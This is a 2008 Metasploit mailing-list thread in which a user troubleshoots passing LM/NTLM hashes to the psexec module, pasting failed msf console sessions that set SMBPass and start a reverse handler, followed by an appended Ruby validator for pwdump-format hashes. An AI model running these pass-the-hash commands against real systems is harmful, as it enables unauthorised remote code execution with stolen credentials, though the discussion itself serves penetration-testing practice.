[framework] Using LM and NTLM Hashes with Metasploit's psexec

Mathew Brown mathewbrown at fastmail.fm
Fri Apr 11 22:21:56 CDT 2008


Hi HD,
  Thank you for your reply, but I can't seem to get it to work.  Also,
  where would I get the NTLM response from?  I currently have the LM and
  NTLM hashes, not responses.  I tried setting it to the LM:NTLM hash
  but it failed.  I then tried it with just the NTLM hash and it also
  failed.  Finally, I tried it in the :NTLM: format and it failed. 
  Here's an example of what it tells me (the hash isn't really important
  since it's a test machine):

msf exploit(psexec) > set SMBPass
::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
SMBPass =>
::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1
SMBPass => b9d2d4957b330b503cc792eb6a55bb1
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f:
msf exploit(psexec) > exploit
[*] Started reverse handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[-] Exploit failed: Login Failed: The server responded with error:
STATUS_LOGON_FAILURE (Command=115 WordCount=0)

Also, how would psexec differentiate between you sending it an NTLM hash
to use for authentication and you sending it a password?  In the example
above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f?  How
would psexec know that this was an NTLM hash and not a password?  Any
ideas?  Thanks for your help.

PS.  I'm currently running Metasploit v3.1.  After the failed attempts
above, I verified that psexec works fine when I provide it with the real
password and not the LM or NTLM hashes.

> On Friday 11 April 2008, H D Moore wrote:
> I think you can just set SMBPass to the NTLM response and call it done 
> (thanks grutz!).
> 
> -HD
> 
> On Friday 11 April 2008, Mathew Brown wrote:
> > Hi,
> >   After running info windows/smb/psexec in Metasploit, it tells me:
> >   "This module uses a valid administrator username and password (or
> >   password hash) to execute an arbitrary payload."  I currently have
> > the LM and NTLM hashes for a valid account on a remote machine but not
> > the actual password.  How would I pass this information to the SMBPass
> > variable?  Should I just put it as LM:HASH?  Thanks.
> > --
> >   Mathew Brown
> >   mathewbrown at fastmail.fm
-- 
  Mathew Brown
  mathewbrown at fastmail.fm

-- 
http://www.fastmail.fm - The professional email service
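The question raised in the thread is essentially one of format: how does a tool tell an LM:NTLM hash pair apart from a plaintext password, and what does a well-formed pwdump-style entry look like? The following is an added example, not code from the thread or from Metasploit; the function names `classify_smbpass` and `parse_pwdump_line` are hypothetical, and the shape rule it applies (two 32-character hex fields separated by a colon) is the conventional pwdump layout, not a description of psexec's internal parsing.

```ruby
# Added example (not from the original thread or Metasploit): a small
# validator for the pwdump-style "user:rid:LM:NTLM:::" credential format.
# It shows why a hash pair is recognisable by shape (two 32-character hex
# fields) while an arbitrary password string is not, and it flags hash
# fields of the wrong length or with non-hex characters.

HEX32 = /\A[0-9a-fA-F]{32}\z/

# Classify a candidate SMBPass value as either a plaintext password or an
# LM:NTLM pair. Only the exact two-field, 32-hex-per-field shape is
# treated as a hash pair; everything else is treated as a password.
def classify_smbpass(value)
  fields = value.split(':', -1)
  if fields.length == 2 && fields.all? { |f| f.match?(HEX32) }
    { kind: :hash_pair, lm: fields[0].downcase, ntlm: fields[1].downcase }
  else
    { kind: :password, value: value }
  end
end

# Parse a full pwdump line and report problems with the hash fields.
# Returns { error: ... } when the line does not have enough fields,
# otherwise the parsed fields plus an :errors array (empty when valid).
def parse_pwdump_line(line)
  parts = line.chomp.split(':', -1)
  if parts.length < 4
    return { error: "expected at least 4 colon-separated fields, got #{parts.length}" }
  end
  user, rid, lm, ntlm = parts[0, 4]
  errors = []
  errors << "LM hash is #{lm.length} chars, expected 32 hex" unless lm.match?(HEX32)
  errors << "NTLM hash is #{ntlm.length} chars, expected 32 hex" unless ntlm.match?(HEX32)
  { user: user, rid: rid, lm: lm.downcase, ntlm: ntlm.downcase, errors: errors }
end

if __FILE__ == $PROGRAM_NAME
  # Sample values taken from the thread above (the poster states they are
  # from a test machine); the first line's NTLM field is 31 characters long.
  sample_line = '::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::'
  puts parse_pwdump_line(sample_line).inspect
  puts classify_smbpass('570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1f').inspect
  puts classify_smbpass('b9d2d4957b330b503cc792eb6a55bb1f').inspect
end
```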